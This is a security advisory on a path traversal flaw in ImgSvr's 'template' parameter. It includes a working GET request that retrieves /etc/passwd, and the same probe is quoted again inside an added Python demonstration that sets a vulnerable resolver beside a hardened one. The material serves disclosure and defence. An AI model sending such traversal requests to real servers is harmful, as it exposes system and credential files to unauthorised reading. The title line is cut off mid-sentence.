Security Advisory 06 – 059 – ImgSvr is vulnerable to
Vulnerability discovery and development:
Portcullis Security Testing Services discovered this vulnerability.
Credit for Discovery:
Tim Brown – Portcullis Computer Security Ltd.
Affected versions:
All known versions of ImgSvr.
Details:
The template parameter of an HTTP request to ImgSvr is used to locate a file on disk, and its value is not confined to the web root. A value containing ../ sequences therefore causes ImgSvr to return arbitrary files from outside of the web root. For example, the following request is sufficient to retrieve /etc/passwd:
GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0
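The example below is added to this advisory and is not ImgSvr's source: it reconstructs the symptom with a hypothetical naive template resolver, places a hardened resolver beside it, and checks both against the request quoted above. The function names, the htdocs web root and the sample files are constructed for illustration; the hardened version canonicalises the joined path with realpath and rejects anything that does not remain under the canonical web root.

```python
"""Path traversal via a 'template' parameter: vulnerable resolver beside a hardened one.

Added example for this advisory; it is not ImgSvr's source. The resolver names,
the 'htdocs' web root and the sample files are constructed for illustration.
"""
import os
import tempfile
from urllib.parse import parse_qs, urlsplit

# The probe request quoted in the advisory (only the request line is needed here).
PROBE = "GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0"


def template_from_request_line(request_line):
    """Return the decoded 'template' query parameter of an HTTP request line, or None."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    values = params.get("template")
    return values[0] if values else None


def resolve_template_vulnerable(webroot, template):
    """Hypothetical naive resolver showing the advisory's symptom: the parameter is
    joined onto the web root with no canonicalisation, so '..' segments (and an
    absolute path, which os.path.join lets replace the root outright) escape it."""
    return os.path.join(webroot, template)


def resolve_template_hardened(webroot, template):
    """Confine the template to the web root. Returns the canonical path, or None to reject.

    Both sides are canonicalised with realpath so '..' segments, absolute paths and
    symlinks are resolved before the containment check is made on the result."""
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, template))
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


def demo():
    """Build a throwaway tree and exercise both resolvers; returns the observations."""
    with tempfile.TemporaryDirectory() as base:
        webroot = os.path.join(base, "htdocs")
        os.makedirs(webroot)
        with open(os.path.join(webroot, "gallery.tmpl"), "w") as f:
            f.write("<html>gallery</html>")          # legitimate template inside the root
        with open(os.path.join(base, "secret.txt"), "w") as f:
            f.write("outside the web root")          # constructed stand-in for /etc/passwd

        # One '..' reaches the sibling file in this tree; the advisory's longer run of
        # '..' behaves the same on a real host because path resolution stops at '/'.
        traversal = "../secret.txt"
        with open(resolve_template_vulnerable(webroot, traversal)) as f:
            leaked = f.read()

        legit = os.path.realpath(os.path.join(webroot, "gallery.tmpl"))
        return {
            "vulnerable_leaks": leaked == "outside the web root",
            "hardened_rejects": resolve_template_hardened(webroot, traversal) is None,
            "hardened_rejects_advisory_probe": resolve_template_hardened(
                webroot, template_from_request_line(PROBE)) is None,
            "hardened_allows_legit": resolve_template_hardened(webroot, "gallery.tmpl") == legit,
        }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'yes' if ok else 'no'}")
```

The containment test compares canonical paths rather than scanning the parameter for "../": string filters miss absolute paths and encoded variants, whereas realpath resolves whatever the parameter contains and the prefix check then decides on the result. Because symlinks inside the web root are also resolved, a link that points outside the root is rejected too, which is the conservative choice for a server that should only ever serve its own templates.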
Impact:
An unauthenticated attacker could read arbitrary files from the host running ImgSvr, limited to those readable by the account under which the ImgSvr process runs.
Exploit:
Exploit code is not required; the single GET request shown above is sufficient.
Vendor status:
Contacted firstname.lastname@example.org and email@example.com
e-mailed – 16th January 2007
e-mailed – 22nd January 2007
e-mailed – 14th February 2007
e-mailed – 15th March 2007